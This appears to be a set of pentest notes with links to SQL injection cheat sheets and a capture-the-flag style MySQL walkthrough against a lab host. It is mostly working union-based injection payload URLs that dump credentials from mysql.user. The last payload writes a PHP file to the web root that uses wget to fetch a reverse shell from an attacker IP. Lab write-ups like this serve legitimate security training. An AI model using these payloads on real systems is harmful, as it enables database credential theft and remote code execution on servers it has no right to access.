XSS | SQLi

MSSQL:-

https://hydrasky.com/network-security/mssql-server-injection-tutorial/

https://gracefulsecurity.com/sql-injection-exploitation/

https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/

ORACLE UNION:-

http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html

MYSQL:-

On visiting the URL in browser we find a hotel booking page. We find a parameter vulnerable to SQLi: http://10.10.10.143/room.php?cod=1 Add a \ after the parameter value to check for SQLi: http://10.10.10.143/room.php?cod=1\ It hides some content from the webpage indicating of an SQLi. Lets find total columns. But before that, Lets fix the query: http://10.10.10.143/room.php?cod=1 --+ Now lets find the total number of vulnerable columns: http://10.10.10.143/room.php?cod=1 order by 1 --+ Replace the column no., till it hides some content from the webpage. The column no. before that is total columns present. Here total columns is 7. Now we need to find the vulnerable column: http://10.10.10.143/room.php?cod=1 union select 1,2,3,4,5,6,7 --+ We don't get any results. This is because SQL interprets the first query first. Lets add - before the value to get the vulnerable column: http://10.10.10.143/room.php?cod=-1 union select 1,2,3,4,5,6,7 --+ We get the no. of vulnerable columns. We know that column 2 shows the Room name so it might be a string. Lets exploit that column. http://10.10.10.143/room.php?cod=-1%20union%20select%20all%201,(SELECT%20group_concat(host,user,password)%20FROM%20mysql.user),3,4,5,6,7--+

Lets download a copy of php-reverse-shell: http://10.10.10.143/room.php?cod=-1 union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.4/pentest.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'